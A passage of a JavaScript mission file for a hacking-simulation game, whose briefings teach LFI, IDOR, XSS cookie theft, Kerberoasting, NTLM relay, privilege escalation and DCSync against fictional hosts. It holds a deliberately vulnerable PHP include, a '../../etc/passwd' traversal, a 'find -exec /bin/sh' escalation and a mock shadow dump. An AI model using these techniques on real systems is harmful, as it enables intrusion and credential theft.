        '.bash_history':      'ssh d.cross@10.0.0.91\nmysql -u helios_admin -p\ncat /etc/helios/pipeline.conf\ntail -f /var/log/helios/ingest.log',
      },
    },
    reward:  { crypto: 2000 },
    unlocks: ['cryptobreaker', 'vpn_tunnel'],
    check(G) { return (G.persistedHosts || []).includes('172.20.1.100'); },
  },

  {
    id: 'a3m3',
    act: 3,
    title: 'Operation BLACKOUT',
    objective: 'Decrypt grid_schema.enc and download the plaintext proof',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 23:01:17 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The backup server referenced in admin_config.json' },
      { type: 'info', text: 'holds an encrypted copy of the Helios power-grid schema.' },
      { type: 'info', text: 'This is the smoking gun — Helios can trigger blackouts.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The file is AES-256 encrypted. But the key was derived' },
      { type: 'info', text: 'from helios_key.bin — which you already have.' },
      { type: 'info', text: 'CryptoBreaker will handle the decryption automatically.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.50.0.1' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 22 → crack → ls → decrypt grid_schema.enc → download grid_schema.dec' },
      { type: 'dim',  text: 'New command: decrypt <file> — break AES-256 with key material.' },
    ],
    target: {
      ip:       '10.50.0.1',
      hostname: 'helios-backup-store',
      ports: {
        22:  { service: 'SSH',   banner: 'OpenSSH 8.7 — Backup Storage Node', crackable: true, password: 'Backups@H3lios!', complexity: 'high' },
        873: { service: 'rsync', banner: 'rsync 3.2.7 — Backup Daemon',       crackable: false, hidden: true },
      },
      files: {
        'grid_schema.enc':  '[AES-256-CBC ENCRYPTED]\nHeader: HELIOS_GRID_v4\nIV: 3a7f2c9d1e4b8a6f\nCiphertext size: 18.7 MB\nKey derivation: helios_key.bin + PBKDF2',
        'backup_manifest.txt': '2026-04-01  grid_schema.enc         18.7MB  OK\n2026-04-01  pipeline_config.enc      2.1MB  OK\n2026-04-15  subject_index.enc       41.3MB  OK',
        'README.txt':       'Encrypted backup store — Helios Project\nDecryption requires helios_key.bin\nUnauthorised access is a federal offence.',
      },
      decryptedFiles: {
        'grid_schema.enc': {
          name:    'grid_schema.dec',
          content: [
            '=== HELIOS GRID SCHEMA — DECRYPTED ===',
            'Classification: EYES ONLY — VOSS / CROSS',
            '',
            'National Grid Injection Points — Phase 3',
            '  Node A: Drax Power Station     (53.7°N  0.9°W)  — ARMED',
            '  Node B: Sizewell B             (52.2°N  1.6°E)  — ARMED',
            '  Node C: Hinkley Point C        (51.2°N  3.1°W)  — STANDBY',
            '',
            'Trigger protocol: BLACKOUT_SIGMA',
            'Authentication:   dual-key (Voss + Cross)',
            'Effect:           cascading grid failure, 6-14 hour outage',
            'Purpose:          civil unrest → emergency powers declaration',
            '',
            'This document constitutes evidence of conspiracy to commit',
            'acts of infrastructure terrorism. — Archive for prosecution.',
            '=======================================',
          ].join('\n'),
        },
      },
    },
    reward:  { crypto: 3000 },
    unlocks: [],
    check(G) { return G.downloadedFiles.includes('grid_schema.dec'); },
  },

  {
    id: 'a3m4',
    act: 3,
    title: 'Deep Cover',
    objective: 'Exfiltrate all evidence files from the Veridian data warehouse',
    briefing: [
      { type: 'sys',  text: '[ URGENT — 01:47:03 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Veridian is shredding. Legal got wind of the investigation.' },
      { type: 'info', text: 'Their data warehouse goes offline in under an hour.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Everything is there — subject records, pipeline configs,' },
      { type: 'info', text: 'financial transfers, the decoded Helios payload.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Don\'t cherry-pick. Use exfil — bulk-download everything' },
      { type: 'info', text: 'in one pass before the window closes.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 192.168.100.5' },
      { type: 'warn', text: 'WARNING: Large transfer will spike trace. Move fast.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 22 → crack → exfil' },
      { type: 'dim',  text: 'New command: exfil — bulk-download all files from target.' },
    ],
    target: {
      ip:       '192.168.100.5',
      hostname: 'veridian-dw-prod',
      ports: {
        22:   { service: 'SSH',  banner: 'OpenSSH 7.9 — Veridian Data Warehouse', crackable: true, password: 'DW_Pr0d#Vrd!', complexity: 'high' },
        3306: { service: 'MySQL',banner: 'MySQL 8.0 — Helios Subject DB',          crackable: false, hidden: true },
      },
      files: {
        'subject_index.csv':    'subject_id,name,postcode,profile_score,flag\n1,REDACTED,SW1A 1AA,97,RISK_HIGH\n2,REDACTED,EC1A 1BB,43,MONITOR\n...\n[2,847,221 records total]',
        'pipeline_config.json': '{"ingest_endpoint":"https://helios.blacksite.int/api/v3","auth_token":"hlsx_31f9a2b8","flush_on_shutdown":false,"retain_pii":true}',
        'financial_transfers.csv':'date,from,to,amount_btc,ref\n2026-01-14,VOSS_OFFICE,NightOwl_BTC,120.0,Q1_OPS\n2026-02-28,NightOwl_BTC,broker-drop-01,44.5,HELIOS_KEY\n2026-04-01,VOSS_OFFICE,NightOwl_BTC,200.0,PHASE3_GO',
        'helios_decoded.pdf':   '[PDF — HELIOS PROJECT DOSSIER]\nFull technical specification, subject pipeline architecture,\ngovernment co-signatories, and Phase 3 blackout trigger plan.\nThis document is the complete evidence package.',
        'destroy_order.txt':    'FROM: D.Cross\nTO:   IT Ops\nRE:   DR-PROTOCOL-9\nWipe all Helios data assets by 03:00. Full DBAN pass.\nDo not confirm via email.',
      },
    },
    reward:  { crypto: 4000 },
    unlocks: [],
    check(G) { return G.downloadedFiles.includes('helios_decoded.pdf'); },
  },

  {
    id: 'a3m5',
    act: 3,
    title: 'GHOST ZERO',
    objective: 'Break into Senator Voss\'s personal server and download zero_day_proof.txt',
    briefing: [
      { type: 'sys',  text: '[ FINAL MISSION — 03:12:00 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'One target left. The source.' },
      { type: 'info', text: 'Senator Voss\'s personal server — air-gap adjacent,' },
      { type: 'info', text: 'hardened, no brute-force entry.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'But it\'s running OpenSSH < 9.3p2.' },
      { type: 'info', text: 'CVE-2023-38408: ssh-agent forwarding RCE.' },
      { type: 'info', text: 'Unpatched. A loaded PKCS#11 provider allows an attacker' },
      { type: 'info', text: 'to trigger arbitrary library loads via the agent socket.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 185.220.101.55' },
      { type: 'warn', text: 'CRITICAL: This is a one-way door. Do not miss.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 22 → exploit CVE-2023-38408 → download zero_day_proof.txt' },
      { type: 'dim',  text: 'New command: exploit <CVE-ID> — deploy CVE from ExploitDB Client.' },
    ],
    target: {
      ip:       '185.220.101.55',
      hostname: 'voss-personal-01',
      ports: {
        22:   { service: 'SSH',   banner: 'OpenSSH 9.1 — Private (key auth enforced)', crackable: false, cve: 'CVE-2023-38408' },
        443:  { service: 'HTTPS', banner: 'SSL/TLS — Personal Portal',                 crackable: false },
        4444: { service: 'RAT',   banner: '??? — Unidentified listener',               crackable: false, hidden: true },
      },
      files: {
        'zero_day_proof.txt': [
          '=== SENATOR R. VOSS — PERSONAL COMMUNICATIONS ===',
          '',
          'To:   d.cross@veridian.corp',
          'From: rvoss@senate.gov.priv',
          'Date: 2026-03-29',
          'Subj: BLACKOUT_SIGMA — Final Authorisation',
          '',
          'Diana,',
          'All regulatory cover is in place. The emergency powers',
          'framework passes committee on May 3rd. Execute Phase 3',
          'on the night of May 4th. Cascade from Drax.',
          '',
          'Destroy this server after confirmation.',
          '— R.V.',
          '',
          '=== END OF EVIDENCE — TRANSMIT TO PRESS ===',
        ].join('\n'),
        '.voss_private_key': '-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEA[REDACTED — 2048-bit]\n-----END RSA PRIVATE KEY-----',
        'emergency_powers_draft.pdf': '[PDF — CLASSIFIED LEGISLATIVE DRAFT]\nEmergency Powers (National Security) Act 2026\nTrigger conditions: sustained grid failure > 4 hours\nAuthorised actions: suspension of civil liberties clauses 4(a)-4(f)',
      },
    },
    reward:  { crypto: 6000 },
    unlocks: ['osint_suite', 'hash_cracker'],
    check(G) { return G.downloadedFiles.includes('zero_day_proof.txt'); },
  },

  // ── Act 4: The Counterstrike ──────────────────────────────────

  {
    id: 'a4m1',
    act: 4,
    title: 'Dark Profile',
    objective: 'OSINT clearwatch-ops.io to download the analyst_brief.txt intelligence report',
    briefing: [
      { type: 'sys',  text: '[ ENCRYPTED CONTACT — 04:02:11 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'You leaked the files. Voss panicked.' },
      { type: 'info', text: 'He activated ClearWatch Security — a private CI firm.' },
      { type: 'info', text: 'They\'re building a dossier on you right now.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Before they find you, find them.' },
      { type: 'info', text: 'OSINT is passive recon — no connection needed.' },
      { type: 'info', text: 'Public records, DNS, WHOIS, breach databases.' },
      { type: 'info', text: 'No trace. No footprint.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target domain: clearwatch-ops.io' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: osint clearwatch-ops.io' },
      { type: 'dim',  text: 'New command: osint <domain> — passive recon, zero trace.' },
    ],
    target: {
      ip:          '203.0.113.14',
      hostname:    'clearwatch-web-01',
      osintDomain: 'clearwatch-ops.io',
      osintFiles: {
        'analyst_brief.txt': [
          '=== CLEARWATCH SECURITY — INTERNAL BRIEF ===',
          'Case ref: CW-2026-0419',
          'Subject:  GHOST OPERATOR (unidentified)',
          'Status:   ACTIVE HUNT',
          '',
          'Known intrusions attributed to subject:',
          '  - Veridian Corp (10.0.0.x range)',
          '  - Broker relay (185.220.101.47)',
          '  - Senator Voss relay (10.77.0.5)',
          '  - Blacksite SIP gateway (172.16.10.5)',
          '',
          'ClearWatch internal IPs (recovered from DNS leak):',
          '  docs server:  10.20.0.5',
          '  HR portal:    10.20.0.18',
          '  admin panel:  10.20.0.33',
          '  core server:  10.20.0.50',
          '  AD controller: 10.20.100.5',
          '',
          'Lead analyst: J. Harker (j.harker@clearwatch-ops.io)',
          '============================================',
        ].join('\n'),
      },
      ports: {
        80:  { service: 'HTTP',  banner: 'nginx/1.22 — ClearWatch Public Site', crackable: false },
        443: { service: 'HTTPS', banner: 'SSL/TLS — ClearWatch Portal',         crackable: false },
      },
      files: {},
    },
    reward:  { crypto: 500 },
    unlocks: [],
    check(G) { return G.downloadedFiles.includes('analyst_brief.txt'); },
  },

  {
    id: 'a4m2',
    act: 4,
    title: 'Paper Trail',
    objective: 'Use LFI to read the case file on 10.20.0.5 and download it',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 04:44:18 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'ClearWatch\'s internal doc server is running a PHP app.' },
      { type: 'info', text: 'The file parameter isn\'t sanitised.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'LFI — Local File Inclusion:' },
      { type: 'info', text: '  The app passes ?file= directly to include().' },
      { type: 'info', text: '  Feed it a path traversal sequence (../../) to read' },
      { type: 'info', text: '  any file the web server process can access.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.20.0.5' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 80 → inject → lfi ../../var/www/private/cw_casefile.txt' },
      { type: 'dim',  text: 'New command: lfi <path> — path traversal to read server files.' },
    ],
    target: {
      ip:       '10.20.0.5',
      hostname: 'clearwatch-docs-srv',
      ports: {
        80:  { service: 'HTTP', banner: 'Apache/2.4.54 — ClearWatch Docs', crackable: false, injectable: true },
        22:  { service: 'SSH',  banner: 'OpenSSH 8.9 — Key Auth Only',     crackable: false },
      },
      files: {
        'index.php':     '<?php include($_GET["file"]); ?>\n<!-- ClearWatch Docs v1.4 -->',
        'welcome.txt':   'ClearWatch Secure Documentation Server\nAuthorised personnel only.',
      },
      lfiPaths: {
        '../../var/www/private/cw_casefile.txt': [
          '=== CLEARWATCH CASE FILE CW-2026-0419 ===',
          'Subject:      GHOST OPERATOR',
          'Priority:     CRITICAL',
          'Assigned to:  J. Harker, M. Osei',
          '',
          'Attack fingerprint:',
          '  Exit nodes: 185.220.x.x (Tor)',
          '  Tools: custom SSH cracker, SQLi kit, SIP sniffer',
          '  Pattern: slow & methodical, low trace target',
          '',
          'Next step: deploy honeypot on 10.20.0.50',
          'Note: subject may attempt to compromise our AD domain.',
          '  AD controller at 10.20.100.5 — harden immediately.',
          '============================================',
        ].join('\n'),
        '../../etc/passwd': 'root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nharker:x:1001:1001:J. Harker:/home/harker:/bin/bash',
      },
    },
    reward:  { crypto: 700 },
    unlocks: ['shell_builder'],
    check(G) { return G.downloadedFiles.some(f => f.includes('cw_casefile')); },
  },

  {
    id: 'a4m3',
    act: 4,
    title: 'Broken Access',
    objective: 'Use IDOR to find the ClearWatch mole (employee_id 7) and download the record',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 05:31:52 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'ClearWatch\'s HR API exposes employee data.' },
      { type: 'info', text: 'The endpoint is: /api/employee?id=<number>' },
      { type: 'info', text: '' },
      { type: 'info', text: 'IDOR — Insecure Direct Object Reference:' },
      { type: 'info', text: '  The API trusts the id parameter without checking' },
      { type: 'info', text: '  if the caller is authorised to access that record.' },
      { type: 'info', text: '  Enumerate IDs to find sensitive entries.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Intelligence suggests an inside contact — employee #7.' },
      { type: 'warn', text: 'Target IP: 10.20.0.18' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 80 → inject → idor 7' },
      { type: 'dim',  text: 'New command: idor <id> — probe API for unauthorised records.' },
    ],
    target: {
      ip:       '10.20.0.18',
      hostname: 'clearwatch-hr-api',
      ports: {
        80: { service: 'HTTP', banner: 'nginx/1.20 — ClearWatch HR API', crackable: false, injectable: true },
        22: { service: 'SSH',  banner: 'OpenSSH 9.0 — Key Auth Only',    crackable: false },
      },
      files: {
        'api_readme.txt': 'ClearWatch HR API v2.3\nEndpoints: /api/employee?id=N\nAuth: session token required (bypass via SQLi)',
      },
      idorFiles: {
        param: 'employee_id',
        records: {
          '1': 'employee_id=1,name=James Harker,role=Lead Analyst,clearance=5,salary=140000',
          '2': 'employee_id=2,name=Miriam Osei,role=Senior Analyst,clearance=4,salary=120000',
          '3': 'employee_id=3,name=Luca Ferretti,role=Ops Coordinator,clearance=3,salary=95000',
          '7': 'employee_id=7,name=VOSS_MOLE,role=Analyst,clearance=5,voss_contact=TRUE,handler=R.Voss,note=Do not expose. Feeds intel to VOSS_OFFICE.',
        },
      },
    },
    reward:  { crypto: 850 },
    unlocks: [],
    check(G) { return G.downloadedFiles.some(f => f.includes('employee_id_7')); },
  },

  {
    id: 'a4m4',
    act: 4,
    title: 'Cookie Monster',
    objective: 'XSS the ClearWatch admin portal and steal the lead analyst\'s session cookie',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 06:15:09 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Harker — the lead analyst — is logged into the admin portal.' },
      { type: 'info', text: 'Steal his session and we can read everything they have on us.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'XSS — Cross-Site Scripting:' },
      { type: 'info', text: '  Inject JavaScript into an input that gets reflected' },
      { type: 'info', text: '  or stored and executed by another user\'s browser.' },
      { type: 'info', text: '  The victim\'s cookies are sent to our collector.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.20.0.33' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 443 → xss' },
      { type: 'dim',  text: 'New command: xss — inject payload and capture session cookies.' },
    ],
    target: {
      ip:       '10.20.0.33',
      hostname: 'clearwatch-admin-portal',
      ports: {
        443: { service: 'HTTPS', banner: 'nginx/1.22 — ClearWatch Admin Portal', crackable: false },
        80:  { service: 'HTTP',  banner: 'nginx/1.22 — Redirect to HTTPS',       crackable: false },
        22:  { service: 'SSH',   banner: 'OpenSSH 9.1 — Key Auth Only',          crackable: false },
      },
      files: {
        'portal_info.txt': 'ClearWatch Admin Portal v3.1\nSupports search, comments, and reporting.\nNo input sanitisation on search field (known issue — backlog).',
      },
      xssPayload: {
        cookieData: [
          'session=cw_harker_5f3dc92a1b4e8a20d31f9',
          'user=j.harker@clearwatch-ops.io',
          'role=lead_analyst',
          'csrf_token=XK9mPq2rLv',
          'remember_me=true',
        ].join('\n'),
      },
    },
    reward:  { crypto: 1000 },
    unlocks: [],
    check(G) { return G.downloadedFiles.includes('captured_session.txt'); },
  },

  {
    id: 'a4m5',
    act: 4,
    title: 'Root Canal',
    objective: 'Enumerate, escalate to root, and dump credentials on 10.20.0.50',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 07:02:33 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'ClearWatch\'s core server runs their case management system.' },
      { type: 'info', text: 'We need root — then we can pull every file they have on us.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Post-exploitation chain:' },
      { type: 'info', text: '  1. enum    — find privesc vectors (LinPEAS-style)' },
      { type: 'info', text: '  2. privesc — exploit a vector to escalate to root' },
      { type: 'info', text: '  3. dump    — extract /etc/shadow password hashes' },
      { type: 'info', text: '  4. hash    — crack the hashes offline (Hashcat)' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.20.0.50' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 22 → crack → enum → privesc → dump → hash shadow.txt' },
      { type: 'dim',  text: 'New chain: enum → privesc → dump → hash' },
    ],
    target: {
      ip:       '10.20.0.50',
      hostname: 'clearwatch-srv-core',
      ports: {
        22:   { service: 'SSH',  banner: 'OpenSSH 8.4 — ClearWatch Core', crackable: true, password: 'CW_Core#2026!', complexity: 'medium' },
        3306: { service: 'MySQL',banner: 'MySQL 8.0 — Case DB',           crackable: false, hidden: true },
      },
      files: {
        'case_db_export.sql': '-- ClearWatch case_management DB\nINSERT INTO cases VALUES (419,"GHOST_OPERATOR","ACTIVE","J.Harker");\nINSERT INTO suspects VALUES (1,NULL,"Tor exit node user","HIGH");',
        'ops_manual.txt':     'ClearWatch Ops Manual v4\nSection 7: Active hunts require dual-analyst sign-off.\nSection 12: All root access must be logged in /var/log/cw_audit.log',
      },
      enumVectors: [
        'SUID binary: /usr/bin/find  — abusable via GTFOBins (find . -exec /bin/sh \\; -quit)',
        'Sudo rule: www-data ALL=(ALL) NOPASSWD: /usr/bin/python3',
        'World-writable cron: /etc/cron.hourly/cw_backup.sh',
        'Kernel: Linux 5.4.0-174  — vulnerable to CVE-2022-0847 (Dirty Pipe)',
      ],
      privescVuln: 'sudo_python3',
      dumpFile: {
        name:    'shadow.txt',
        content: [
          '# /etc/shadow — extracted from clearwatch-srv-core',
          'root:$6$rounds=5000$cwsalt01$HASH_ROOT:19000:0:99999:7:::',
          'harker:$6$rounds=5000$cwsalt02$HASH_HARKER:19000:0:99999:7:::',
          'cw_svc:$6$rounds=5000$cwsalt03$HASH_CWSVC:19000:0:99999:7:::',
          '',
          '>>> Run "hash shadow.txt" to crack <<<',
        ].join('\n'),
      },
    },
    reward:  { crypto: 2500 },
    unlocks: ['ad_toolkit'],
    check(G) { return G.rootedHosts.includes('10.20.0.50'); },
  },

  // ── Act 5: Domain Zero ────────────────────────────────────────

  {
    id: 'a5m1',
    act: 5,
    title: 'The Map',
    objective: 'Run BloodHound on the ClearWatch AD domain controller and download ad_report.txt',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — ACT 5 — 08:14:00 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'ClearWatch\'s entire operation runs on a Windows' },
      { type: 'info', text: 'Active Directory domain: CLEARWATCH.INT' },
      { type: 'info', text: '' },
      { type: 'info', text: 'BloodHound maps trust relationships between users,' },
      { type: 'info', text: 'groups, and machines. It finds shortest attack paths' },
      { type: 'info', text: 'from a low-privilege user to Domain Admin.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The shadow file gave us cw_svc credentials.' },
      { type: 'info', text: 'That account can authenticate to the DC.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.20.100.5  (Domain Controller)' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 22 → crack → bloodhound → download ad_report.txt' },
      { type: 'dim',  text: 'New command: bloodhound — map Active Directory attack paths.' },
    ],
    target: {
      ip:       '10.20.100.5',
      hostname: 'clearwatch-dc-01',
      ports: {
        22:  { service: 'SSH',      banner: 'OpenSSH 8.1 — CLEARWATCH.INT DC', crackable: true, password: 'CW_Svc#2026!', complexity: 'medium' },
        88:  { service: 'Kerberos', banner: 'Microsoft Kerberos KDC',           crackable: false },
        389: { service: 'LDAP',     banner: 'Microsoft LDAP — CLEARWATCH.INT',  crackable: false },
        445: { service: 'SMB',      banner: 'Microsoft SMB 3.1.1',              crackable: false },
      },
      files: {
        'dc_info.txt': 'Domain Controller: CLEARWATCH.INT\nForest Level: Windows 2019\nDomain Admins: Administrator, J.Harker\nService Accounts: cw_svc, cw_pipeline, cw_backup',
      },
      adGraph: {
        domain:  'CLEARWATCH.INT',
        users:   ['Administrator', 'J.Harker', 'M.Osei', 'cw_svc', 'cw_pipeline', 'cw_backup'],
        groups:  {
          'Domain Admins':   ['Administrator', 'J.Harker'],
          'Analysts':        ['M.Osei'],
          'Service Accounts':['cw_svc', 'cw_pipeline', 'cw_backup'],
        },
        paths: [
          'cw_svc → WriteOwner on cw_pipeline → GenericAll on Analysts → DCSync rights → Domain Admin',
          'cw_backup → WriteDACL on Domain Admins OU → Full domain compromise',
        ],
      },
      kerberoastHashes: [
        { user: 'cw_pipeline', spn: 'HTTP/clearwatch-app.clearwatch.int', hash: '$krb5tgs$23$*cw_pipeline$CLEARWATCH.INT$HTTP/clearwatch-app*$C3D4E5...TRUNCATED' },
        { user: 'cw_backup',   spn: 'MSSQLSvc/clearwatch-db.clearwatch.int:1433', hash: '$krb5tgs$23$*cw_backup$CLEARWATCH.INT$MSSQLSvc/clearwatch-db*$F6G7H8...TRUNCATED' },
      ],
      asrepHashes: [
        { user: 'M.Osei', hash: '$krb5asrep$23$M.Osei@CLEARWATCH.INT:9I0J1K...TRUNCATED' },
      ],
      pivotRoutes: ['10.20.100.20', '10.20.100.30'],
    },
    reward:  { crypto: 1800 },
    unlocks: [],
    check(G) { return G.downloadedFiles.includes('ad_report.txt'); },
  },

  {
    id: 'a5m2',
    act: 5,
    title: 'Ticket Storm',
    objective: 'Kerberoast and AS-REP roast the domain — download both hash files',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 09:02:44 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'BloodHound found two attack paths — both start with' },
      { type: 'info', text: 'cracking service account passwords.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Kerberoasting: request TGS tickets for service accounts.' },
      { type: 'info', text: '  Tickets are encrypted with the service account\'s hash.' },
      { type: 'info', text: '  Crack them offline — no lockout risk.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'AS-REP Roasting: for accounts with pre-auth disabled,' },
      { type: 'info', text: '  the KDC returns a hash without needing any credential.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.20.100.5  (Domain Controller)' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: connect → crack → kerberoast → download kerberoast_hashes.txt → asrep → download asrep_hashes.txt' },
      { type: 'dim',  text: 'New commands: kerberoast, asrep — offline-crackable Kerberos attacks.' },
    ],
    target: {
      ip:       '10.20.100.5',
      hostname: 'clearwatch-dc-01',
      ports: {
        22:  { service: 'SSH',      banner: 'OpenSSH 8.1 — CLEARWATCH.INT DC', crackable: true, password: 'CW_Svc#2026!', complexity: 'medium' },
        88:  { service: 'Kerberos', banner: 'Microsoft Kerberos KDC',           crackable: false },
        389: { service: 'LDAP',     banner: 'Microsoft LDAP — CLEARWATCH.INT',  crackable: false },
        445: { service: 'SMB',      banner: 'Microsoft SMB 3.1.1',              crackable: false },
      },
      files: {
        'dc_info.txt': 'Domain Controller: CLEARWATCH.INT\nService accounts with SPNs: cw_pipeline, cw_backup\nPre-auth disabled for: M.Osei (helpdesk legacy config)',
      },
      kerberoastHashes: [
        { user: 'cw_pipeline', spn: 'HTTP/clearwatch-app.clearwatch.int', hash: '$krb5tgs$23$*cw_pipeline$CLEARWATCH.INT$HTTP/clearwatch-app*$C3D4E5...TRUNCATED' },
        { user: 'cw_backup',   spn: 'MSSQLSvc/clearwatch-db.clearwatch.int:1433', hash: '$krb5tgs$23$*cw_backup$CLEARWATCH.INT$MSSQLSvc/clearwatch-db*$F6G7H8...TRUNCATED' },
      ],
      asrepHashes: [
        { user: 'M.Osei', hash: '$krb5asrep$23$M.Osei@CLEARWATCH.INT:9I0J1K...TRUNCATED' },
      ],
    },
    reward:  { crypto: 2200 },
    unlocks: [],
    check(G) {
      return G.downloadedFiles.includes('kerberoast_hashes.txt') &&
             G.downloadedFiles.includes('asrep_hashes.txt');
    },
  },

  {
    id: 'a5m3',
    act: 5,
    title: 'Network Poison',
    objective: 'NTLM relay attack on the analyst workstation (10.20.100.20)',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 10:18:55 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'An analyst workstation is broadcasting LLMNR requests.' },
      { type: 'info', text: 'These are Windows name resolution fallback queries —' },
      { type: 'info', text: 'broadcast, unauthenticated, and interceptable.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'NTLM Relay (Responder + ntlmrelayx):' },
      { type: 'info', text: '  1. Responder poisons LLMNR/NBT-NS responses.' },
      { type: 'info', text: '  2. Victim machine sends us its NTLMv2 challenge.' },
      { type: 'info', text: '  3. We relay that auth to SMB on another host.' },
      { type: 'info', text: '  4. No password needed — just captured packets.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.20.100.20  (Analyst workstation)' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 445 → relay' },
      { type: 'dim',  text: 'New command: relay — NTLM relay attack, no password required.' },
    ],
    target: {
      ip:       '10.20.100.20',
      hostname: 'clearwatch-ws-harker',
      ports: {
        445: { service: 'SMB',  banner: 'Microsoft SMB 3.1.1 — J.Harker Workstation', crackable: false },
        139: { service: 'NetBIOS', banner: 'NetBIOS Session Service',                  crackable: false },
        22:  { service: 'SSH',  banner: 'OpenSSH 8.0 — WS SSH',                       crackable: true, password: 'CW_Svc#2026!', complexity: 'low', hidden: true },
      },
      files: {
        'broadcast_log.txt': 'LLMNR query from 10.20.100.20: Who has clearwatch-files?\nLLMNR query from 10.20.100.20: Who has clearwatch-print?\n[Responding with poison — capturing NTLMv2 hash]',
      },
      pivotRoutes: ['10.20.100.5', '10.20.100.30'],
    },
    reward:  { crypto: 2500 },
    unlocks: [],
    check(G) { return G.relayedHosts.includes('10.20.100.20'); },
  },

  {
    id: 'a5m4',
    act: 5,
    title: 'Lateral Strike',
    objective: 'Pivot from the compromised workstation to reach the domain controller (10.20.100.5)',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 11:07:22 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'You\'re on Harker\'s workstation. The domain controller' },
      { type: 'info', text: '(10.20.100.5) isn\'t directly reachable from outside.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Pivoting — SSH tunneling:' },
      { type: 'info', text: '  Route traffic through a compromised host to reach' },
      { type: 'info', text: '  internal segments. The workstation bridges your' },
      { type: 'info', text: '  connection into the domain admin subnet.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Lateral Movement:' },
      { type: 'info', text: '  Use stolen creds to execute commands on other hosts.' },
      { type: 'info', text: '  Impacket\'s psexec.py, WinRM, smbexec — same principle.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.20.100.20  (jump host → 10.20.100.5)' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 22 → crack → pivot 10.20.100.5 → move 10.20.100.5' },
      { type: 'dim',  text: 'New commands: pivot <ip>, move <ip> — tunnelling and lateral movement.' },
    ],
    target: {
      ip:       '10.20.100.20',
      hostname: 'clearwatch-ws-harker',
      ports: {
        22:  { service: 'SSH', banner: 'OpenSSH 8.0 — Workstation SSH', crackable: true, password: 'CW_Svc#2026!', complexity: 'low' },
        445: { service: 'SMB', banner: 'Microsoft SMB 3.1.1',           crackable: false },
      },
      files: {
        'network_map.txt': 'Reachable from this workstation:\n  10.20.100.5   clearwatch-dc-01    (Domain Controller)\n  10.20.100.30  clearwatch-files-01 (File Server)\n  10.20.0.x     internal app subnet',
      },
      pivotRoutes: ['10.20.100.5', '10.20.100.30'],
    },
    reward:  { crypto: 3000 },
    unlocks: [],
    check(G) { return G.pivotRoutes.includes('10.20.100.5'); },
  },

  {
    id: 'a5m5',
    act: 5,
    title: 'Domain Down',
    objective: 'Own the domain controller — exfil domain_hashes.ntds to complete the AD takeover',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 12:00:00 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The pivot is live. The domain controller is in range.' },
      { type: 'info', text: 'Finish it.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'DCSync: once you\'re on the DC, you can replicate' },
      { type: 'info', text: '  the NTDS.dit database — every hash for every user' },
      { type: 'info', text: '  in the domain. Domain Admins included.' },
      { type: 'info', text: '' },
